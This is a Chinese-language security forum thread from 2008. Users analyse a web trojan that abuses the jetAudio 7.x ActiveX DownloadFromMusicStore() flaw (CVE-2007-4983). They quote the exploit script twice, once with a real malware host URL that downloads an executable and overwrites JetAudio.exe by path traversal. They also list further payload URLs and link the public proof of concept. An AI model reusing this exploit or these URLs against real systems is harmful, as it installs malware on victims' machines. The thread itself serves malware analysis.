JetAudio漏洞

宝贝要升天了

程序:
C:\DOCUMENTS AND SETTINGS\MILLSHANGSHANG\LOCAL SETTINGS\TEMP\RAR$EX00.884\XZZ.EXE
木马程序生成以下文件:
1) C:\PROGRAM FILES\COMMON FILES\SYSTEM\LNNCKCH.EXE
2) C:\PROGRAM FILES\COMMON FILES\MICROSOFT SHARED\HHAWSSB.EXE
3) C:\PROGRAM FILES\MEEX.EXE
是否删除木马程序及其衍生物?

ALEXBLAIR

document.writeln("var dst = \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Program Files\\\\JetAudio\\\\JetAudio.exe\";");

这个定位方式比较流氓~~

qigang

原帖由 ALEXBLAIR 于 2008-3-30 17:10 发表
document.writeln("var dst = \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Program Files\\\\JetAudio\\\\JetAudio.exe\";");

这个定位方式比较流氓~~

很黄很暴力，应该是最近很流行的东西。

ALEXBLAIR

document.writeln("<HTML>");
document.writeln("<object id=\"obj\" classid=\"clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8\"><\/object>");
document.writeln("<script>");
document.writeln("var target = \"DownloadFromMusicStore\";");
document.writeln("\/\/>rename evil.exe evil.mp3");
document.writeln("var url = \"http://rich1893.yccnc.hapt03.cn/xzz.exe\"");
document.writeln("var dst = \"..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Program Files\\\\JetAudio\\\\JetAudio.exe\";");
document.writeln("var title = \"0day\";");
document.writeln("var artist = \"h07\";");
document.writeln("var album = \"for fun\";");
document.writeln("var genere = \"exploit\";");
document.writeln("var size = 256;");
document.writeln("var param1 = 0;");
document.writeln("var param2 = 0;");
document.writeln("obj[target](url, dst, title, artist, album, genere, size, param1, param2);");
document.writeln("<\/script>");
document.writeln("<\/HTML>");
document.writeln("");

没看懂为什么会出现0day
难道说是JetAudio在执行文件的时候是通过PE的么？
之前伪造exe为mp3
这个软件还是会执行它么？
本地也一样么~~囧了
~~~~~~~~~~~~
作者的标题还是挺友好的
document.writeln("var title = \"0day\";");

估计是某个帖子里挖出来的，被用来干坏事了~~

醉一生爱妍

http://translate.google.com/tran ... N&hl=zh-CN&ie=UTF-8

部分看不明白的~~可以吧鼠标放到中文那里，就会显示出原文了

坏事不少哦！~~~

http://rich1893.yccnc.hapt03.cn/kl.exe	%ProgramFiles%\1Akl.exe
http://rich1893.yccnc.hapt03.cn/gz.exe	%ProgramFiles%\2Bgz.exe
http://rich1893.yccnc.hapt03.cn/nh.exe	%ProgramFiles%\3Cnh.exe
http://gx.gx-ruanjian.com/xx/en.txt	%ProgramFiles%\newso.txt
http://gx.gx-ruanjian.com/xx/edown.txt	%ProgramFiles%\sonew.txt

[ 本帖最后由 garyyan456 于 2008-3-30 17:30 编辑 ]

ALEXBLAIR

这个地址好像不对的样子

醉一生爱妍

我不知道，我就是看那出来的地址的、。。。

andy9394

熊猫卫士启发报

tanlimo

百度搜索

该漏洞在2007年的9月19日由 h07安全组织的Krystian Kloskowski (h07@interia.pl) 发步，其漏洞攻击代码发布在milw0rm.com 上，文章为

jetAudio 7.x ActiveX DownloadFromMusicStore() Code Execution Exploit

今天就发现了一个利用该漏洞进行挂马的病毒，代码如下：

<HTML>
<!--
jetAudio 7.x ActiveX DownloadFromMusicStore() 0day Remote Code Execution Exploit
Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl>
Tested on:..
- jetAudio 7.0.3 Basic
- Microsoft Internet Explorer 6
Just for fun    ;)
-->

<object id="obj" classid="clsid:8D1636FD-CA49-4B4E-90E4-0A20E03A15E8"></object>

<script>
var target = "DownloadFromMusicStore";
//>rename evil.exe evil.mp3
var url = "http://***.exe
var dst = "..\\..\\..\\..\\..\\..\\..\\..\\Program Files\\JetAudio\\JetAudio.exe";
var title = "0day";
var artist = "h07";
var album = "for fun";
var genere = "exploit";
var size = 256;
var param1 = 0;
var param2 = 0;
obj[target](url, dst, title, artist, album, genere, size, param1, param2);
</script>
</HTML>

该漏洞可以将病毒文件*.exe 下载并替换成Program Files\\JetAudio\\JetAudio.exe应用软件，其实这可以替换成任意文件，也可以添加到开机自启动目录中，等待下次开机执行病毒，阴险啊～～～

该漏洞的CVE数据库信息：

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4983

参考代码（我是叫你参考，可没叫你干别的意思～～～）：

http://milw0rm.com/exploits/4427

tanlimo

回15楼




漏一个，两TXT无法访问